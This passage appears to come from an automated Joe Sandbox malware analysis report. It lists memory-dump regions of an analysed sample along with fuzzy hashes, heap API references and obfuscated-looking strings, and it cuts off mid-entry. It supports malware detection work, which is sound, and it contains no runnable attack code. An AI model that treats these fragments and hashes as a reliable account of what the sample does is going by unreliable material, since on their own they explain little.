                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 87ded20036001e761f92203bd81c9935baeab4a59ef0d1429e9d457a9d01ec16
                                                                                                      • Instruction ID: 530dc4970ab366b1b93a515b7ad9a17ad3576194ab986a544afde50753a3c6cc
                                                                                                      • Opcode Fuzzy Hash: 87ded20036001e761f92203bd81c9935baeab4a59ef0d1429e9d457a9d01ec16
                                                                                                      • Instruction Fuzzy Hash: 7E418034609380ABD724EB16E8A0B2BF7E6EF85714F58882CF58997251D331EC01CB72
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 2c228eaebff6c0d6176fc6afaea35e7f2a4acc2e27f8c608159b1d8b2de49e90
                                                                                                      • Instruction ID: 30333d9c418745c454541a18ea4eb176d148fbdb66310ece0d928369db120e9f
                                                                                                      • Opcode Fuzzy Hash: 2c228eaebff6c0d6176fc6afaea35e7f2a4acc2e27f8c608159b1d8b2de49e90
                                                                                                      • Instruction Fuzzy Hash: 8631F570609341BADA24EB06DD81F3AB7A1EB90B94F68850CF2C1972D1D370E810CB72
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4977e1930442ed93c226d28f2cbc046e0a00a420d4cfcb0849e38dd9c463faf1
                                                                                                      • Instruction ID: bce38d167215205ffce24227f33d3418ce31c9594cfaa8408a48fbc33cea618b
                                                                                                      • Opcode Fuzzy Hash: 4977e1930442ed93c226d28f2cbc046e0a00a420d4cfcb0849e38dd9c463faf1
                                                                                                      • Instruction Fuzzy Hash: BF2105B4A0025ADBEB15CF94CC90BBEBBB1FF4A304F144848E412BB292C735A901CB64

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 219 de3220-de322f 220 de32ac-de32b0 219->220 221 de3236-de3252 219->221 222 de32a2-de32a6 RtlFreeHeap 219->222 223 de32a0 219->223 224 de3286-de3296 221->224 225 de3254 221->225 222->220 223->222 224->223 226 de3260-de3284 call de5af0 225->226 226->224
                                                                                                      APIs
                                                                                                      • RtlFreeHeap.NTDLL(?,00000000), ref: 00DE32A6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 3298025750-0
                                                                                                      • Opcode ID: 267be2e7633a91c81e9f52cdf646c1d9deb014f58fdbde9ebf0a0d80bc8a9dfe
                                                                                                      • Instruction ID: 1037aafbd411c3e03c38248de509b0578c57352e1336ba7686ea732c96ef6464
                                                                                                      • Opcode Fuzzy Hash: 267be2e7633a91c81e9f52cdf646c1d9deb014f58fdbde9ebf0a0d80bc8a9dfe
                                                                                                      • Instruction Fuzzy Hash: B7014B3450D380DBC701EB18E849A2ABBE9EF4A700F06881CE5C58B361D235ED60DBA6

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 230 de3202-de3211 RtlAllocateHeap
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000), ref: 00DE3208
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: 167b0a63645faf240c33b8657f900381245cfad8de88c1ee815d75b7ecdbc99e
                                                                                                      • Instruction ID: 1fde712a8e8513d2489e055541c6a453c77eced445cb75d670487453e15a9323
                                                                                                      • Opcode Fuzzy Hash: 167b0a63645faf240c33b8657f900381245cfad8de88c1ee815d75b7ecdbc99e
                                                                                                      • Instruction Fuzzy Hash: B1B012300401005FDA042B00EC0AF103512EB00605F900050A101481B1D16258A4C564
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: %*+($()./$89&'$89>?$:WUE$<=2$<=:;$@ONM$AR$D$DCBA$LKJI$QNOL$T$WP$`Y^_$`onm$dcba$lkji$mjkh$tsrq$tuJK$xgfe$|
                                                                                                      • API String ID: 2994545307-1418943773
                                                                                                      • Opcode ID: c5a8f8625653e4c4276cd938c0da6e25dfd4c278d03aeb09208b6da5c8d29772
                                                                                                      • Instruction ID: 7452b6dc3c789f3b836ffacf5dccbbe847805668eb3e54fb522425cc735305d2
                                                                                                      • Opcode Fuzzy Hash: c5a8f8625653e4c4276cd938c0da6e25dfd4c278d03aeb09208b6da5c8d29772
                                                                                                      • Instruction Fuzzy Hash: DEF256B4509381DBD770DF14C884BEBBBE6AFD5344F58482CE4CA8B251DB719984CBA2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %*+($3<$:$Cx$`tii$aenQ$f@~!$fedc$ggxz$mlc@${l`~$|}&C
                                                                                                      • API String ID: 0-786070067
                                                                                                      • Opcode ID: f0178e7c07bf460b6519ee2a1b95ee53cfb4fe97e79f552834129c389807b678
                                                                                                      • Instruction ID: eec4b1a7d7b32d1732df009b1da21ecd1177762423f26d707c644fefe8029e47
                                                                                                      • Opcode Fuzzy Hash: f0178e7c07bf460b6519ee2a1b95ee53cfb4fe97e79f552834129c389807b678
                                                                                                      • Instruction Fuzzy Hash: 3E33AC70504B818FD7258F39C590762BBE1FF16304F58899EE4DA8BB92C735E906CBA1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %e6g$(a*c$=]$?m,o$CG$Gt$JG$N[$WH$]{$hi$kW$/)$S]$WQ$_Y$sm
                                                                                                      • API String ID: 0-1131134755
                                                                                                      • Opcode ID: 56db13346acbba55c0b76b07e8858921a50b0d3f6f74c4d92255b09320c613aa
                                                                                                      • Instruction ID: b80266b2c4270f67dd92b1dd9e45c55aa26a25360fb71b0ead6f4f06c1b1ebf9
                                                                                                      • Opcode Fuzzy Hash: 56db13346acbba55c0b76b07e8858921a50b0d3f6f74c4d92255b09320c613aa
                                                                                                      • Instruction Fuzzy Hash: 6052C7B804D385CAE270CF25D581B8EBAF1BB92744F609A1DE1ED9B255DB708045CFA3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: !E4G$,A&C$2A"_$8;$;IJK$?M0K$B7U1$B?Q9$G'M!$G+X5$L3Y=$O+f)$T#a-$X/R)$pq$z=Q?
                                                                                                      • API String ID: 0-655414846
                                                                                                      • Opcode ID: 1871bbb4ba0209458a01bfd98a85b595b37a8d14c28d3d20627feed29965c7b2
                                                                                                      • Instruction ID: a3b91a1e959d2adc996d22046a2733a47cba98e577781a004f19c8c246d85539
                                                                                                      • Opcode Fuzzy Hash: 1871bbb4ba0209458a01bfd98a85b595b37a8d14c28d3d20627feed29965c7b2
                                                                                                      • Instruction Fuzzy Hash: 45F12CB0518382ABD310DF15D895A2ABBF4FF86B48F144D1CF5D99B252D334DA08CBA6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %*+($)IgK$,Q?S$-M2O$<Y.[$=]+_$Y9N;$hX]N$n\+H$upH}${E
                                                                                                      • API String ID: 0-1557708024
                                                                                                      • Opcode ID: b8229ade853a104853d893d90c3f6bf35dfa36044a9c9cfab455d89e791bda0b
                                                                                                      • Instruction ID: e91f9fb227f5ab6471976aecedd8da4f1197d241367251865684cd9666fa071f
                                                                                                      • Opcode Fuzzy Hash: b8229ade853a104853d893d90c3f6bf35dfa36044a9c9cfab455d89e791bda0b
                                                                                                      • Instruction Fuzzy Hash: AF92D0B5E00206CFDB14CF69D851BAEBBB2FF49310F298169E455AB391D735AD01CBA0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %*+($&> &$,#15$9.5^$cah`$gce/$qrqp${
                                                                                                      • API String ID: 0-4102007303
                                                                                                      • Opcode ID: 5cd36f1c6b0e32363e1f4d8f72dc5c9299053a8e5373c8a519f3c63b2a9cbe4f
                                                                                                      • Instruction ID: 7e2d9b99e8a61fa9ab376c00fc78465f73257eab7993b7fd303bcea912886cb5
                                                                                                      • Opcode Fuzzy Hash: 5cd36f1c6b0e32363e1f4d8f72dc5c9299053a8e5373c8a519f3c63b2a9cbe4f
                                                                                                      • Instruction Fuzzy Hash: 3E6289B56083828BD730DF14D891BABBBE1FF96314F08492DE49A8B742D7759940CB63
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$gfff$gfff$gfff
                                                                                                      • API String ID: 0-2517803157
                                                                                                      • Opcode ID: 457748afb820f47aac5c7c8b2973c59cba5a7346f461e6d922cd4df5a64cb728
                                                                                                      • Instruction ID: c980abc46ce2dae61b32ad4ab940c16da0587a4368f107ea1b5e63557ae01ba5
                                                                                                      • Opcode Fuzzy Hash: 457748afb820f47aac5c7c8b2973c59cba5a7346f461e6d922cd4df5a64cb728
                                                                                                      • Instruction Fuzzy Hash: EFD2E2756083418FD718CE2DC49436ABBE2AFDA314F188A2DF4D98B391D734D945CBA2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 3)[k$H{rv$WX|$]8q$_Vd{$z0]$D{k
                                                                                                      • API String ID: 0-1635636441
                                                                                                      • Opcode ID: 6a441443d1617676ae69cd8dc07e73be37a5a2ab634fbe914d2eb210cfcfb4d3
                                                                                                      • Instruction ID: d965daf3dedcbf8d850e74f4c66c52c076e1edcdb9faffbc6892ea379ee7a509
                                                                                                      • Opcode Fuzzy Hash: 6a441443d1617676ae69cd8dc07e73be37a5a2ab634fbe914d2eb210cfcfb4d3
                                                                                                      • Instruction Fuzzy Hash: 23B2F4F36082049FE704AF2DEC8567ABBE5EF94720F168A3DEAC4C7344E63558058697
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_da0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: -Sw*$1zwM$El+G$XS?$uWvf
                                                                                                      • API String ID: 0-3517640657
                                                                                                      • Opcode ID: 336fd47b4137fd4d8eb9d1bf629736c4bbd7ec43581a4ae9d5176a5e5a65eacb
                                                                                                      • Instruction ID: bb45a0afc3767dcb7e2a4f1fa6f212766612243343d237048fd7d37eb1e65d98
                                                                                                      • Opcode Fuzzy Hash: 336fd47b4137fd4d8eb9d1bf629736c4bbd7ec43581a4ae9d5176a5e5a65eacb
                                                                                                      • Instruction Fuzzy Hash: 27B228F360C204AFE3046E2DEC8567AFBE9EF94320F1A853DE6C583744EA7558058697
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
